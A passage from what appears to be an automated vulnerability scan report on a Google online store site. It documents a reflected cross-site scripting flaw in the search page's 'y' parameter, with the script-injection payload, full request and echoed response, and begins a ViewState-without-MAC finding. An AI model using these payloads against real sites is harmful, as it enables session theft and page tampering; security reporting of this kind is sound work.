<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

1.5. http://www.googlestore.com/googlesearch.aspx [y parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb842'><script>alert(1)</script>958042b681e was submitted in the y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0eb842'><script>alert(1)</script>958042b681e HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.43.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2709

__VIEWSTATE=%2FwEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc%2BQmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc%2BUHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E%2BPGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc%2BSG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E%2BZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI%2BPGNlbnRlcj5EaWQgeW91IG1lYW4gPGk%2BPGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E%2BPzwvZm9udD48L2k%2BPC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABakDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQxNzM0OWYzNzQ4NCZyZXN0cmljdEJ5PWdzY2F0ZWdvcnkodGV4dCk6YWNjZXNzb3JpZXNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRNjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwLdgJGXBAKs4eTNDgK6oZTsCg%3D%3D&ctlSignup%24EmailAddress=cdd&ctlSignup%24btnSignUp.x=37&ctlSignup%24btnSignUp.y=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:29:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0eb842scriptalert(1)/script958042b681e&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessories&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0eb842scriptalert(1)/script958042b681e&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" selected>Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Accessories</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484'/>accessories</a> / <a href='googlesearch.aspx?category=accessories'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessories&x=0&y=0eb842'><script>alert(1)</script>958042b681e&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="formerror">Invalid Email Format</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAX7AzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTBlYjg0MnNjcmlwdGFsZXJ0KDEpL3NjcmlwdDk1ODA0MmI2ODFlJnJhbmtCeT1wcmljZTphc2NlbmRpbmcnPlByaWNlICgkLSQkJCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCZ4PTAmeT0wZWI4NDJzY3JpcHRhbGVydCgxKS9zY3JpcHQ5NTgwNDJiNjgxZSZyYW5rQnk9cHJpY2U6ZGVzY2VuZGluZyc+UHJpY2UgKCQkJC0kKTwvYT48YnIvPmQCAQ8WAh4HVmlzaWJsZWgWAgIBDxYCHwBlZAICDxYCHwFoFgICAQ8WAh8AZWQCAw8WAh8BaBYCAgEPFgIfAGVkAgQPFgIfAGVkAgUPFgIfAAXRAjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Jz5Ib21lPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9xPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCcvPmFjY2Vzc29yaWVzPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcycvPnhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NDwvYT5kAgYPFgIfAGVkAgcPFgIfAAXIAjxoMj48Y2VudGVyPkRpZCB5b3UgbWVhbiA8aT48Zm9udCBjb2xvcj0nYmx1ZScgPiA8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3NvcmllcyZ4PTAmeT0wZWI4NDInPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD45NTgwNDJiNjgxZSZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E+PzwvZm9udD48L2k+PC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgRmDw8WBh4IQ3NzQ2xhc3MFCWZvcm1lcnJvch4EVGV4dAUUSW52YWxpZCBFbWFpbCBGb3JtYXQeBF8hU0ICAmRkAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkAgsPFgIfAAWpA2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3Nob3BwaW5nL3NlYXJjaC92MS9jeDowMTY0NTg1MDE2NDU4ODQwNTc5MTI6ZHFfaXhid2h1azgvcHJvZHVjdHM/ZmFjZXRzLmVuYWJsZWQ9dHJ1ZSZjb3VudHJ5PXVzJm1heFJlc3VsdHM9MTImZmFjZXRzLnVzZUdjc0NvbmZpZz1UcnVlJmZhY2V0cy5kaXNjb3Zlcj0xMDA6MTAwJmFsdD1hdG9tJnNwZWxsaW5nLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLmVuYWJsZWQ9dHJ1ZSZwcm9tb3Rpb25zLnVzZUdjc0NvbmZpZz10cnVlJmtleT1BSXphU3lDU0pNYXY2YXlnamxWM3p1MHZsNDBqYnJNaGRLZkZjcm8mcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGFzY3JpcHRhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0MTczNDlmMzc0ODQmcmVzdHJpY3RCeT1nc2NhdGVnb3J5KHRleHQpOmFjY2Vzc29yaWVzZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwKqtKvfDAKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

2. ASP.NET ViewState without MAC enabled previous next
There are 4 instances of this issue:

/Wearables/Organic+Black+is+Back+T-Shirt.axd
/googlesearch.aspx
/shop.axd/PrivacyPolicy
/shoppingcart.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

